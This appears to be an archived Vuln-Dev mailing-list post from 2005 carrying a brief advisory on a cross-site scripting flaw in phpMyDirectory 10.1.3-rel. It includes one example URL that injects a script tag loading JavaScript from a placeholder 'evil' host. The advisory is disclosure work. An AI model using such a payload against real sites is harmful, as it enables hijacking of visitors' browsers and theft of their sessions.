Network Security: Detailed info on phpMyDirectory 10.1.3-rel Cross site scripting

Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.

Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.

Network Security Vuln-Dev

Subject:	phpMyDirectory 10.1.3-rel Cross site scripting
Date:	25 Mar 2005 19:30:00 -0000

Subject:

phpMyDirectory 10.1.3-rel Cross site scripting

Date:

25 Mar 2005 19:30:00 -0000

Talte Security Advisory #3 Product: phpMyDirectory 10.1.3-rel Homepage: http://www.phpmydirectory.com/ Risk: low Type: Cross Site Scripting Bug Found by: "Talte Security - mircia" phpMyDirectory is a multi-purpose script, this script can be successfully implemented for Proffesional Yellow pages, books library, friend finder etc. A cross site scripting problem exists in subcat,page,subsubcat variables. Examples: http://localhost/review.php?id=1&cat=&subcat=";><script src=http://evil/foo.js></script> Everything in foo.js gets executed // Best Regrads - Talte security, mircia

<Prev in Thread]	Current Thread	[Next in Thread>
phpMyDirectory 10.1.3-rel Cross site scripting, mircia mircia <=

<Prev in Thread]

Current Thread

[Next in Thread>

Previous by Date:	Re: Secure Science issues preview of their upcoming block cipher, Adam Shostack
Next by Date:	Re: New Whitepaper: Anti Brute Force Resource Metering, Joachim Schipper
Previous by Thread:	Security Flaw with Digital signatures in Microsoft Outlook, Roberto Franceschetti
Next by Thread:	smail remote and local root holes, sean
Indexes:	[Date] [Thread] [Top] [All Lists]

Previous by Date:

Re: Secure Science issues preview of their upcoming block cipher, Adam Shostack

Next by Date:

Re: New Whitepaper: Anti Brute Force Resource Metering, Joachim Schipper

Previous by Thread:

Security Flaw with Digital signatures in Microsoft Outlook, Roberto Franceschetti

Next by Thread:

smail remote and local root holes, sean

Indexes:

[Date] [Thread] [Top] [All Lists]